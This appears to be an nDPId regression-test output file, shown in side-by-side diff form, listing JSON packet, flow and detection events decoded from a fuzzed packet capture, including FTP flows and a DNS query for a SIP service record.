00442{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1120469635106,"pkt":"AODtAW69ADBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00428{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1120469635106,"pkt":"AODtAW69ADBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":72,"global_ts_msec":1120469635127} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":72,"global_ts_msec":1120469635127}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="}
00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW69CABFAAB6abtAAIAGOXvAqAEGk+oB\/Qqh5ncb6piKAAAAAHACQABGAAAAAgQFtAkBBAI="} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW69CABFAAB6abtAAIAGOXvAqAEGk+oB\/Qqh5ncb6piKAAAAAHACQABGAAAAAgQFtAkBBAI="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":28,"global_ts_msec":1120469635129} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":28,"global_ts_msec":1120469635129}
00429{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00415{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469635147} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469635147}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="}
00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":42,"pkt_len":54,"pkt_l4_len":12,"thread_ts_msec":1120469635152,"pkt":"ADBUADRWAODtAW69CABHAAAoabxAAIAGOYLAqAECk+oB\/Qqh5ncb6piL5SG6HVAQQiTRUAAA"} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":42,"pkt_len":54,"pkt_l4_len":12,"thread_ts_msec":1120469635152,"pkt":"ADBUADRWAODtAW69CABHAAAoabxAAIAGOYLAqAECk+oB\/Qqh5ncb6piL5SG6HVAQQiTRUAAA"}
00231{"basic_event_id":13,"basic_event_name":"TCP packet smaller than expected","datalink":1,"thread_id":0,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","size":54,"expected":62,"global_ts_msec":1120469635152} 00217{"basic_event_id":13,"basic_event_name":"TCP packet smaller than expected","datalink":1,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","size":54,"expected":62,"global_ts_msec":1120469635152}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"}
00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469638585} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469638585}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1120469663172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469663172,"pkt":"ADBUADRWAODtAW69CABFAABIacgAAIARTYnAqAECwIgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1120469663172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469663172,"pkt":"ADBUADRWAODtAW69CABFAABIacgAAIARTYnAqAECwIgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -149,8 +149,8 @@
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1120469666174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469666174,"pkt":"ADBUADRWAODtAW69CABFAABIacoAAIARpYfAqAECwKgBAQqiADUANFpNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1120469666174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469666174,"pkt":"ADBUADRWAODtAW69CABFAABIacoAAIARpYfAqAECwKgBAQqiADUANFpNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1120469668178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW69CABFAABIacsAAIARTYbAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhADA="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1120469668178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW69CABFAABIacsAAIARTYbAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhADA="}
